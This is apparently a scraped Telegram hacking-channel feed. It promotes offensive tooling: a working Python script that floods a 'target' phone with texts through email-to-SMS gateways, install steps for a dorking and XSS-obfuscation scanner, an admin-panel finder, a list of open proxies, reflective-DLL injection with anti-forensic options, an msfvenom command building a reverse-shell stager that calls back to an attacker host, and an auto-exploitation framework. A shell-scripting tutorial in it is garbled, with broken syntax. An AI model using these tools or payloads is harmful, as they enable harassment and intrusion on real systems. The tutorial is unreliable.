UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.4K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Proxy service-IP forwarding settings for intranet and extranet by undercode :
instagram.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

> We have a computer with two network cards, eth0 connected to the external network, ip is 1.2.3.4 ; eth1 is connected to the internal network, the ip is 192.168.0.1. Now you need to forward the ip packet sent to port 81 of address 1.2.3.4 to port 8180 of ip address 192.168.0.2, set as follows:

1) iptables -t nat -A PREROUTING -d 1.2.3.4 -p tcp -m tcp --dport 81 -j DNAT 192.168.0.2:8180

2) iptables -t nat -A POSTROUTING -d 192.168.0.2 -p tcp -m tcp --dport 8180 -j SNAT The
actual transmission process of 192.168.0.1 is as follows:
Suppose a client's ip address is 6.7.8.9, it uses the local port of 1080 to connect to port 81 of 1.2.3.4, and the source address of the outgoing ip packet is 6.7.8.9, the source The port is 1080, the destination address is 1.2.3.4, and the destination port is 81.

3) After the host 1.2.3.4 receives this packet, according to the first rule of the nat table, the destination address of the ip packet should be changed to 192.168.0.2, the destination port should be 8180, and an entry should be created in the connection tracking table. (Can be seen from the / proc / net / ip_conntrack file), and then sent to the routing module, by checking the routing table to determine that the IP packet should be sent to the eth1 interface. Before sending the ip packet to the eth1 interface, according to the second rule, the more the source address of the packet ip 192.168.0.1 (the case whether it is more appropriate entry in the connection table tracking unacknowledged, who clearly requested guidance), and then sent to the interface eth1.

4) and The ip packet sent back from 192.168.0.2, the destination address is 192.168.0.1, the destination port is 1080, and the TCP / IP stack of the host 1.2.3.4 receives the ip packet, the core looks for a match in the connection tracking table, and then Change the destination address of the ip packet from 192.168.0.1 to the original client's ip address 6.7.8.9, keeping the port number 1080 unchanged. In this way, the server's return packet can correctly return the client that initiated the connection, and the communication is like this Start.

Written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ This program allows us to send text messages via email :
instagram.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

#using the targets cellular sms gateway address

#we can set multiple source email addresses so the target

#receives messages from multiple users

import time

import smtplib

#All configuration changes should occur in this portion of the code

email_server = 'smtp.gmail.com' #smtp address for source email address

email_server_port = 587 #port number of smtp server for source email

email_address = ["exampleaddress@gmail.com","cramhackexample@gmail.com"] #email to send from

#you can add an email by simply putting a comma and inserting another email and password

email_password = ["passwordForEmail","NextEmailsPassword"] #email address password

msg = "message to send" #Whatever you want to send to the target

number_of_texts = 2 #Amount of times you want to text target

target_email = "3474447777@mms.att.net" #Targets cellular number in email format

pause = 10 #Seconds to wait in between messages

#All configuration changes should occur above this portion of the code

# No more configurations below #

for i in range(0,number_of_texts):

for x in range(0,len(email_address)):

server = smtplib.SMTP(email_server, email_server_port)

server.starttls()

server.login(email_address[x], email_password[x])

server.sendmail(email_address[x],target_email,msg)

print("text message sent")

server.quit()

time.sleep(pause)

# PROGRAM COMPLETE

print("All texts have been sent")

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Captcha bypasss-PANEL- WEBHACKING ...updated Advanced reconnaissance utility :
t.me/undercodeTesting

πŸ¦‘ FEATURES :

A powerful built in URL parsing engine
Multiple search engine compatibility (DuckDuckGo, AOL, Bing, and Google default is Google)
Ability to extract the URL from Google's ban URL thus bypassing IP blocks
Ability to extract from Google's webcache URL
Proxy compatibility (http, https, socks4, socks5)
Tor proxy compatibility and Tor browser emulation
Parse robots.txt/sitemap.xml and save them to a file
Multiple vulnerability assessments (XSS, SQLi, clickjacking, port scanning, admin panel finding, whois lookups, and more)
Tamper scripts to obfuscate XSS payloads
Can run with a custom default user-agent, one of over 4000 random user-agents, or a personal user-agent
Automatic issue creation when an unexpected error arises
Ability to crawl a webpage and pull all the links
Can run a singular dork, multiple dorks in a given file, or a random dork from a list of over 5000 carefully researched dorks
Dork blacklisting when no sites are found with the search query, will save the query to a blacklist file
Identify WAF/IPS/IDS protection of over 20 different firewalls
Header protection enumeration to check what kind of protection is provided via HTTP headers
Saving cookies, headers, and other vital information to log files
and much more...

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1)> Ubuntu/Debian

sudo apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py

2) centOS

sudo apt-get install gcc python-devel libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && sudo pip2 install -r requirements.txt && sudo python zeus.py

3) Backbox
64 bit installation:

sudo -s << EOF
aptitude purge firefox
wget https://ftp.mozilla.org/pub/firefox/releases/57.0/linux-x86_64/en-US/firefox-57.0.tar.bz2
tar -xjf firefox-57.0.tar.bz2
rm -rf /opt/firefox*
mv firefox /opt/firefox57
mv /usr/bin/firefox /usr/bin/firefoxold
ln -s /opt/firefox57/firefox-bin /usr/bin/firefox
apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && pip2 install -r requirements.txt && python zeus.py
EOF

πŸ¦‘ 32 bit installation:

sudo -s << EOF
aptitude purge firefox
wget https://ftp.mozilla.org/pub/firefox/releases/57.0/linux-i686/en-US/firefox-57.0.tar.bz2
tar -xjf firefox-57.0.tar.bz2
rm -rf /opt/firefox*
mv firefox /opt/firefox57
mv /usr/bin/firefox /usr/bin/firefoxold
ln -s /opt/firefox57/firefox-bin /usr/bin/firefox
apt-get install libxml2-dev libxslt1-dev python-dev && git clone https://github.com/ekultek/zeus-scanner.git && cd zeus-scanner && pip2 install -r requirements.txt && python zeus.py
EOF

TESTED BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘[ Admin panel finder / Admin Login Page Finder ] :
> note : this script can run on windows and linux but we don t recommend at all to run on windows :
instagram.com/undercodeTesting

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

Linux :

1) sudo apt install tor

2) sudo apt install python3-socks (optional)

3) pip3 install --user -r requirements.txt

4) git clone https://github.com/mIcHyAmRaNe/okadminfinder3.git

5) cd okadminfinder3

6) chmod +x okadminfinder.py

7) python3 okadminfinder.py


πŸ¦‘ Pentestbox (same procedure as Linux)
you can add an alias by adding this line: okadminfinder=py -3 "%pentestbox_ROOT%/bin/Path/to/okadminfinder3/okadminfinder.py" $* to C://Pentestbox/bin/customtools/customaliases file and so you'll be able to launch it using okadminfinder

πŸ¦‘ Features:

1) More than 500 potential admin panels

2) Tor & Proxy

3) Random-Proxy

4) Random-Agents

5) Console work with params, like: okadminfinder.py -u example.com -- proxy 127.0.0.1:8080

6) Self-Update

7) Classify admin panel links by popularity

8) Multithreading, for faster work

9) Adding more potential admin panel pages

TESTED BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ PREMIUM PROXIES :LASTEST :
instagram.com/undercodeTesting

198.50.177.44 44699 SOCKS4
Canada Canada
Quebec MontrΓ©al High anonymity 6109 kB/s
74.9%
3 ms
11 hours ago


142.93.57.37 80 HTTP
Canada Canada
Ontario Toronto High anonymity 6074 kB/s
99.7%
51 ms
11 hours ago

149.56.1.48 8181 SOCKS4
Canada Canada
Quebec MontrΓ©al High anonymity 5892 kB/s
94.2%
3 ms
15 hours ago

192.241.245.207 1080 SOCKS5
United States United States
New York New York High anonymity 5537 kB/s
99.2%
77 ms
14 hours ago

173.199.122.27 8080 HTTPS
United States United States
New Jersey Piscataway Transparent 5505 kB/s
89.5%
83 ms
12 hours ago

206.72.197.232 3128 HTTPS
United States United States
Pennsylvania Warrington Transparent 5098 kB/s
14.6%
70 ms
13 hours ago

54.156.164.61 80 HTTP
United States United States
Virginia Ashburn High anonymity 5070 kB/s
93.2%
162 ms
16 hours ago

165.227.182.151 8888 HTTPS
United States United States
New Jersey Clifton High anonymity 3456 kB/s
40.5%
49 ms
11 hours ago

206.81.5.218 8080 HTTPS
United States United States
California Oakland Transparent 3369 kB/s
42.9%
53 ms
15 hours ago

34.73.42.211 80 HTTPS
United States United States
Texas Houston High anonymity 2986 kB/s
100%
141 ms
12 hours ago

206.72.197.231 3128 HTTPS
United States United States
Pennsylvania Warrington Transparent 2947 kB/s
18.2%
62 ms
14 hours ago

169.48.152.174 3128 HTTP
Netherlands Netherlands
Transparent 2935 kB/s
65.7%
15270 ms
9 hours ago

165.227.215.62 1080 SOCKS5
United States United States
New Jersey Clifton High anonymity 2818 kB/s
99.6%
61 ms
11 hours ago

52.179.231.206 80 HTTP
United States United States
Virginia Boydton High anonymity 2797 kB/s
100%
239 ms
10 hours ago

142.93.122.155 8118 HTTP
Canada Canada
Ontario Toronto High anonymity 2794 kB/s
21.1%
40 ms
15 hours ago

168.169.146.12 8080 HTTP
United States United States
New York Buffalo Transparent 2764 kB/s
50.4%
289 ms
17 hours ago

138.197.157.45 1080 SOCKS5
Canada Canada
Ontario Toronto High anonymity 2319 kB/s
97.9%
45 ms
14 hours ago

67.205.132.241 1080 SOCKS5
United States United States
New Jersey North Bergen High anonymity 2238 kB/s
98.6%
59 ms
11 hours ago

148.153.11.58 39593 SOCKS4
United States United States
Texas Plano High anonymity 2230 kB/s
87.2%
15055 ms
13 hours ago

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Pazuzu: Reflective DLL to run binaries from memory- payload and hack system like expert
> Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.
fb.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

HOW AND WHY THIS SCRIPT :

The script Pazuzu.py accepts as input the binary you want to run from memory (parameter -f). Depending on the properties of the binary Pazuzu will choose one of the 3 DLL currently available. These DLL are:

1) relocΒ­x86.dll: lets you run the binary inside the address space of the process. This option is the most favorable since the binary generates less "noise" in the system.

2)dforkingΒ­x86.dll: the binary in this case also runs from memory but using "process hollowing". This technique is the one used by the "execute" command with the -m flag in Meterpreter.
downloadΒ­86.dll: this is the noisiest option since the binary will be downloaded and executed from disk.

3) Pazuzu also provides some additional features. For example, the -x option will encrypt the section containing the binary by using a random RC4 key (which is stored in the DLL TimeStamp). In addition, after running it the PE header of the DLL and the binary section will be overwritten with zeros. I will add more anti-forensic techniques in future versions.

4) With the -p option the resulting DLL will be patched with the bootstrap required to reach the export ReflectiveLoader (more info in www.shelliscoming.com). This option is useful to not depend on the Metasploit handler to inject the DLL. That is, if the DLL is already patched we can upload it to a Web server so that the stager could retrieve it from there (more anonymity).

πŸ¦‘ HOW TO RUN :

1) git clone https://github.com/BorjaMerino/Pazuzu

2) cd Pazuzu

3) run as python

4) To get the Pazuzu DLL I will use a WinHTTP stager:

> root@kali:~# msfvenom -p windows/dllinject/reverse_winhttp lhost=192.168.1.44 lport=8080 dll=. -f exe -o Winhttp-stager.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload

> No Arch selected, selecting Arch: x86 from the payload

> No encoder or badchars specified, outputting raw payload
Payload size: 908 bytes
Saved as: Winhttp-stager.exe

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ SHELL PROGRAMMING FULL BY UNDERCODE :
instagram.com/UndercodeTesting
Shell programming

1) In DOS, you may be engaged in some routine repetitive tasks. At this time, you will write these repetitive commands as a batch file, as long as the batch file is executed Execute these commands. You will ask if there is batch processing in UNIX. The answer is yes. In UNIX, not only batch processing like DOS, its functions are more powerful than DOS, and it is relatively more complicated. It is already comparable to general high-level languages. In UNIX, everyone is not called a batch file, but called Shell Script.

2) In general, the status of Shell Script is exactly the same as other executable files (or commands), except that Shell Script is stored as a text file, not a binary file. When executing Shell Script, there must be a program that converts its contents into a series of commands to execute, and this program is actually Shell, which is why we are called Shell Script (hereafter we call it Script). The scripts of different shells will basically have some differences, so we can't execute the scripts written to the A shell with the B shell. In UNIX, we most commonly use Bourne Shell and C Shell, so this class introduces the writing of these two scripts.

πŸ¦‘ Set the text file as executable Shell Script

If we have written the script, how to set it as an executable file? Because Script is actually an executable file, its access rights must be set to executable. We can use the following commands to change the access rights:
chmod u + x filename can only be executed by others,
chmod ug + x filename can only be executed by yourself and the same group, others cannot be executed by
chmod + x filename

πŸ¦‘ And how do we specify which shell to use to explain the written script? Several basic designation methods are as follows:

!) If the first non-blank character of the script is not "" # "", it will use the Bourne Shell.

2) If the first non-blank character of Script is "" # "", but does not start with "" #! "", Then it will use the C Shell.

4) If the Script starts with "" #! "", Then what is written after "" #! "" Is the Shell used, and the entire path name should be pointed out.

πŸ¦‘ It is recommended to use the third way to specify the Shell to ensure that what is executed is what you want. The path name of the Bourne Shell is / bin / sh, and the C Shell is / bin / csh.


1) Use Bourne Shell
β”Œ β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” ┐ β”Œ β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” ┐
β”‚echo enter filename β”‚ β”‚ ##! / Bin / sh β”‚
β”‚. β”‚ or β”‚. β”‚
β”‚ . β”‚ β”‚. β”‚
β”‚. β”‚ β”‚. β”‚
β”” β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” β”˜ β”” β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” β”˜

2) Use C Shell
β”Œ β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” —┐ β”Œ β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” ┐
β”‚ # C Shell Script β”‚ β”‚ #! / Bin / csh β”‚
β”‚. β”‚ β”‚. β”‚
β”‚. β”‚ β”‚. β”‚
β”‚. β”‚ β”‚.



β”Œ β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” ┐
β”‚ #! / Etc / perl β”‚
β”‚. β”‚
β”‚. β”‚
β”‚. β”‚
β”” β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” β”˜Except

for specifying the shell used in the script In addition, you can also force it in the command line. For example, if you want to use the C Shell to execute a script, you can issue this command:
csh filename

The access right of the script at this time does not have to be an executable file, and the shell specified inside will also be invalid. Will discuss.

β–‘ Script's basic structure and concept

Script is a unit of behavior, and the script we write will be broken down into lines and executed. Each line can be a command, a comment, or a flow control instruction. If a line has not been completed, you can add "" "at the end of the line. At this time, the content of the next line will be received after this line and become the same line, as follows

β”Œ β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” ┐
β”‚ echo The message is β”‚
β”‚too long so we have β”‚
β”‚to split it into β”‚
β”‚several lines β”‚
β”” β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” β”˜When

"" # "" appears in the Script, then the The same line of text is a comment, Shell will not translate it.

πŸ¦‘ The way to execute a command in Script is the same as in the command line. You can execute it in the foreground or background. You also need to set some environmental variables when executing the command.
The flow control of Script is no different from the flow control of general high-level languages. It also has subroutines like high-level languages. These make Script more powerful.

In order to achieve the same effect as high-level languages, we can also set variables in Script, which makes Script a veritable high-level language.

β–‘ Bourne Shell

1- Variables

The variable types of Bourne Shell are only string variables, so to use numerical operations, you must rely on external commands to achieve your goals. And it kind of variables are the following:

1) User variables

This is the most frequently used variables, we can not contain any whitespace string to as variable names. When setting the variable value, use the following method:
var = string When

accessing the variable, add a "" $ "" sign in front of the variable name.


β”Œ β€”β€”β€”β€”β€”β€”β€”β€” ┐
β”‚name = Tom β”‚
β”‚echo name β”‚
β”‚echo $ name β”‚
β”” β€”β€”β€”β€”β€”β€”β€” β”˜ The
result is as follows:
name
undercode

2) System variables (environment variables) are

similar to user variables , But this variable will pass its value to the command it executes. To set a user variable as a system variable, just add:
export var

β”Œ β€”β€”β€”β€”β€”β€”β€” ┐
β”‚name =undercode β”‚
β”‚export name β”‚
β”” β€”β€”β€”β€”β€”β€”β€”β€” β”˜The

following is a user one The system variables that have been set after entering the system:
$ HOME The user's own directory
$ PATH The directory searched when the command is executed
$ TZ Time zone
$ MAILCHECK Check every second for new letters
$ PS1 Prompt number at the command line
$ PS2 When the command has not been finished, Shell Tip number when required and then enter the
search path $ MANPATH man instructions

3) read-only user variables

and user variables similar, but these variables can not be changed. To set user variables to read-only, just add:
readonly var

and if readonly is used, all read-only variables will be listed. Another point is that system variables cannot be set to read-only.

β”Œ β€”β€”β€”β€”β€”β€”β€”β€” ┐
β”‚name = Tom β”‚
β”‚readonly name β”‚
β”‚echo $ name β”‚
β”‚name = John β”‚
β”‚readonly β”‚
β”” β€”β€”β€”β€”β€”β€”β€”β€” β”˜The

result is as follows:
undercode
name: is read only
readonly name
Readonly ......

4)specific variables

some variables are set will start the implementation of Script, and not to be amended, but we do not call it a read-only system variables, and call it a special variable (some books It will be called a read-only system variable), because these variables are present when the program is executed, and users cannot set general system variables to be read-only. The following are some equivalent variables:
$ 0 The execution name of
this program $ n The nth parameter value of this program, n = 1..9
$ * All parameters of
this program $ # Number of parameters of this program
$$ PID of this program
$! Run on the previous background command PID
$? return value to execute a command

πŸ¦‘ when the number of parameters when you run this program when more than nine, we can use the shift command parameters will move forward one space, so you can use the first 10 after the argument. In addition, we can use the set command to change $ n and $ *, as follows:
set string

so the value of $ * is string, and it will be put into $ n after decomposition. If there is no parameter after the set command, all the set variables and their values ​​will be listed.

File name: ex1 Parameters: this is a test

β”Œ β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” ┐
β”‚echo Filename: $ 0 β”‚
β”‚echo Arguments: $ * β”‚
β”‚echo No. of args .: $ # β”‚
β”‚echo 2nd arg .: $ 2 β”‚
β”‚shift β”‚
β”‚echo No. of args .: $ # β”‚
β”‚echo 2nd arg .: $ 2 β”‚
β”‚set hello, everyone β”‚
β”‚echo Arguments: $ * β”‚
β”‚echo 2nd arg .: $ 2 β”‚
β””β€” β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” β”˜
The results are as follows:
Filename: ex1
Arguments: this is a test
No. of args .: 4
2nd arg .: is
No. of args .: 3
2nd arg .: a
Arguments: hello, everyone
2nd arg .: everyone is

worth mentioning Yes, when you want to input a variable value from the keyboard, you can use the following command:
read var1 var2 .....
At this time read will divide a word into a variable. If you enter more words than variables, the last variable will use the remaining words as its value. If you enter fewer words than variables, the following variables will be set to empty strings. If you need to deal with numerical operations, we can use the expr command. Its parameters and output are listed in Appendix A.

πŸ¦‘ Second, Run

There are five methods Bourne Shell execute a command, whereas if the generated five manner slightly different.

1)Direct command
This command mode and effect column as direct command.

2) Use sh command
sh command
This file must be Bourne Shell Script, but this file does not have to be set to be executable. Otherwise, it's the same as direct command.

3) Use the "". "" Command
. Command

At this time, it is similar to using the sh command, except that it does not generally generate a new process like sh. On the contrary, it will complete the work under the original process.

4) Use the exec command
exec command.
This script will be replaced by the executed command. When this command is executed, the script will also end.

5) Replace command
This is a very useful method. If you want to make the output of a command a parameter of another command, you must use this method. We list the command between the two "" "" "signs, and Shell will replace the command and the two" "" "" symbols with the output of this command.

str = '' Current directory is '' '' pwd``
echo $ str
results are as follows:
Current directory is / users / cc / mgtsai
this means pwd this command outputs "" / users / cc / mgtsai "", and then the whole word The string replaces the original `` pwd`` to set the str variable, so the content of the str variable will be output by the pwd command.

number = `` expr $ number + 1''This
is the method mentioned above for numerical operations. Basically, the expr command only solves the expression, and then outputs it to standard output. If you want to set a variable to its value, you have to rely on command replacement. In this example, add 1 to the value of the number variable and then save it back to the number variable.

3) Process control

Before introducing flow control, let's take a look at the test command. The parameters of the test command are conditional judgments. When the condition is true, a non-zero value is returned, and when the condition is false, zero is returned. In all flow control, the test command must be used to judge the authenticity. The method of using the test command is listed in Appendix B.

test $ # = 0

If there are no parameters to execute this program, a non-zero value will be returned to represent "" $ # = 0 "". Otherwise, it returns zero.

πŸ¦‘The following describes various flow control:

1) if then syntax and flow chart are as followsβ”‚

FALSE
if (condition) < condition > —┐
then β”‚TRUE β”‚
then-commands then-commands β”‚
fi β”œ β€”β€”β€”β€” β”˜
β”‚


condition is a test command. The conditions in the various processes introduced later are test commands.
File name: chkarg

β”Œ β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” ┐
β”‚if (test $ #! = 0) β”‚
β”‚ then β”‚
β”‚ echo Arg1: $ 1 β”‚
β”‚fi β”‚
β”” β€”β€”β€”β€”β€”β€”β€”β€”β€” β€”β€”β”˜
$ chkarg Hello
Arg1: Hello
$ chkarg
$

2) if then else syntax and flow chart are as followsβ”‚

FALSE
if (condition) < condition > β€”β€”β€”β€”β€”β€” ┐
then β”‚TRUE β”‚
then-commands then-commands else-commands
else β”œ β€”β€”β€”β€”β€”β€”β€”β€” β”˜
else-commands β”‚
fi

3) if then elif syntax and process The picture is as followsβ”‚

FALSE
if (condition1) < condition1 > —┐
then β”‚TRUE β”‚ FALSE
commands1 commands1 < condition2 > —┐
elif (condition2) β”‚ β”‚ TRUE β”‚
then β”‚ commands2 commands3
commands2 β”œ β€”β€”β€”β€”β€”β€” β”΄ β€”β€”β€”β€” β”˜
else β”‚
commands3

commands3
fi
echo '' word 1: c ''
read word1
echo '' word 2: c ''
read word2
echo '' word 3: c ''
read word3
if (test "" $ word1 "" = "" $ word2 "" -a ""$ word2" "=" "$ word3" ")
then
For in syntax and flow chart are as followsβ”‚ FALSE for var in arg-list β”Œβ€” <arg-list Is there anything else? > —┐ do β”‚ β”‚TRUE β”‚ commands β”‚ Get an item from arg- listβ”‚ done β”‚ put in variable var β”‚ β”‚ β”‚ β”‚ β”‚ commands β”‚ β”” β€”β€”β€”β€”β€”β€” β”˜ β”‚ β”Œ β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” ——┐ β”Œ β€”β€”β€”β€”β€”β€” β”˜ β”‚for a in xx yy zz β”‚ β”‚ β”‚ do β”‚ β”‚ echo $ a β”‚ β”‚done β”‚


πŸ¦‘ β”” β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” β”˜ The
result is as follows:
xx
yy

yy
zz

5) The syntax and flow chart of for are as followsβ”‚

FALSE
for var β”Œβ€” <Is there anything in the parameter? > —┐
do β”‚ β”‚TRUE β”‚
commands β”‚ Get one item from the parameters β”‚
done β”‚ put in the variable var β”‚
β”‚ β”‚ β”‚
β”‚ commands β”‚
β”” β€”β€”β€”β€”β€” β”˜
β”‚File name: lstarg β”Œ β€”β€”β€”β€”β€”β€” β”˜
β”Œ β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” ┐ β”‚
β”‚for a β”‚
β”‚ do β”‚
β”‚ echo $ a β”‚
β”‚done β”‚
β”” β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” β”˜
$ lstarg xx yy zz
xx
yy

yy
zz

6) The syntax and flow chart of while are as followsβ”‚


FALSE
while (condition) β”Œβ€” < condition > —┐
do β”‚ β”‚TRUE β”‚
commands β”‚ commands β”‚
done β”” β€”β€”β€”β€” β”˜ β”‚
β”Œ β€”β€”β€”β€” β”˜
β”‚

β”Œ β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” ┐
β”‚number = 0 β”‚
β”‚while (test $ number -lt 10) β”‚
β”‚ do β”‚
β”‚ echo "" $ numberc "" β”‚
β”‚ number = `` expr $ number + 1`` β”‚
β”‚done β”‚
β”‚echo β”‚
β”” β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€” β”˜ The
result is as follows:
0123456789

7) The syntax and flow chart of until is as followsβ”‚


TRUE
until (condition) β”Œ - <for condition condition> -┐
do β”‚FALSE β”‚ β”‚
Commands Commands β”‚ β”‚
DONE ---- β”” β”˜ β”‚
β”Œ β”˜ ----
β”‚

it and while only difference is that while the condition is true when performing loop, and until The loop is executed when the condition is false.

8)
Both break and continue are used for for, while, until and other loop control. break will jump to done after done, while continue will jump to done and continue to execute the loop.

9) The case syntax and flow chart are as

followsβ”‚ TRUE
case str in <str = pat1> β€”β€”β€”β€” commands1—┐
pat1) commands1 ;; β”‚FALSE TRUE β”‚
pat2) commands2 ;; < str = pat2 > β€”β€”β€”β€” commands2—─
pat3) commands3 ;; β”‚FALSE TRUE β”‚
esac < str = pat3 > β€”β€”β€”β€” commands3—─
β”‚FALSE β”‚
β”œ ------------ β”˜
β”‚

and pat addition can specify certain string, the string may be set to specify, as follows
* arbitrary string
? arbitrary characters
[abc] a, b , one of the three characters or c wherein
[an] a to any one of n characters
| multi selector

β”Œ ┐ ---------------
β”‚echo '' the Enter a, B, or C: c '' β”‚
β”‚read letter β”‚
β”‚case $ letter in β”‚
β”‚ A | a) echo '' You entered A. '' ;; β”‚
β”‚ B | b) echo '' You entered B. '' ;; β”‚
β”‚ C | c) echo '' You entered C. '' ;; β”‚
β”‚ *) echo '' Not A, B, or C '' ;;β”‚
β”‚esac β”‚
β”” β€”β€”β€”β€”β€”β€”β€”β€”

Written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘FASTEST WAY TO LEARN - + SOME TRICK TO SPEED UP
> SHELL PROGRAMMING FULL BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Updated popular tool for Network and Web Pentest Automation Framework :-INCLUDE CVE-
for any linux
instagram.com/UnderCodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

FEATURES :

1) Network Infrastructure Security Assessment

2) Many supported Services: Target most common TCP/UDP services (HTTP, FTP, SSH, SMB, Oracle, MS-SQL, MySQL, PostgreSQL, VNC, etc.).

3) Combine Power of Tools: Each security check is performed by a tool from the toolbox. Attacks are performed by chaining security checks.

4) Context Awareness: Security checks to run are selected and adapted according to the context of the target (i.e. detected technologies, credentials, vulnerabilities, etc.).

5) Reconnaissance: Automatic fingerprinting (product detection) of targeted services is performed.

6) CVE Lookup: When product names and their versions are detected, a vulnerability lookup is performed on online CVE databases (using Vulners & CVE Details).

7) Vulnerability Scanning: Automatically check for common vulnerabilities and attempt to perform some exploitations (auto-pwn).

8) Brute-force Attack: Automatically check for default/common credentials on the service and perform dictionnary attack if necessary.

9) Wordlists are optimized according to the targeted services.

10) Post-authentication Testing: Automatically perform some post-exploitation checks when valid credentials have been found.
πŸ¦‘ Web Security Assessment

1) Large Focus on HTTP: More than 60 different security checks targeting HTTP supported for now.
2) Web Technologies Detection: Fingerprinting engine based on

πŸ¦‘ Wappalyzer is run prior to security checks, allowing to detect: Programming language, Framework, JS library, CMS, Web & Application Server.
1) Server Exploitation: Automatically scan and/or exploit most critical vulnerabilities (e.g. RCE) on web and application servers (e.g. JBoss, Tomcat, Weblogic, Websphere, Jenkins, etc.).

2) CMS Vulnerability Scanning: Automatically run vulnerability scanners on most common CMS (Wordpress, Drupal, Joomla, etc.).

πŸ¦‘ Local Database & Reporting

3) Local Database: Data related to targets is organized by missions (workspaces) into a local Sqlite database that is kept updated during security testings.

4) Metasploit-like Interactive Shell: Access the database through an interactive shell with several built-in commands.

5) Import Targets from Nmap: Add targets to a mission either manually or by loading Nmap results.

6) Import Targets from Shodan: Add targets to a mission manually from shodan (need shodan API key).

7) Access all Results: All outputs from security checks, detected credentials and vulnerabilities are stored into the database and can be accessed easily.

8) Reporting: Generate full HTML reports with targets summary, web screenshots and all results from security testing.

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

Pull Jok3r Docker Image:

1) git clone https://github.com/koutto/jok3r

2) jok3r

3) sudo docker pull koutto/jok3r

πŸ¦‘ Run fresh Docker container:

1) sudo docker run -i -t --name jok3r-container -w /root/jok3r -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix --shm-size 2g --net=host koutto/jok3r
Notes:

